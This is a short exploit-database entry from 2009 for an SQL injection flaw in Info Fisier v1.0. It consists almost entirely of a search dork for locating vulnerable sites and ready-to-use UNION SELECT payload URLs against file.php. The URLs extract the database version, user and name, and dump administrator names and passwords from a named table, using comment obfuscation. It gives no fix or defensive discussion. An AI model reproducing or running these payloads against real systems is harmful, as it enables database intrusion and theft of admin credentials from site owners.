id: 10466
date: 12/27/2009
title: Info Fisier v1.0 SQL Injection Vulnerability
author: AnGrY BoY
cves: 

============================================
Info Fisier v1.0 SQL Injection Vulnerability
============================================

 
[+] Dork     : Powered by Info Fisier
 
 
[+] expolit:
 
[+] http://server/upload/file.php?id=[sql]
 
[+] http://server/upload/file.php?id=-54/**/union/**/select/**/1,concat(version(),0x3e,user(),0x3e,database()),3,4,5,6,7,8,9,10,11--
 
[+] http://server/file.php?id=-670/**/union/**/select/**/1,group_concat(admin,0x3e,pass),3,4,5,6,7,8,9,10,11/**/from+djsefu_useri--
          



#  0day.today [2023-03-27]  #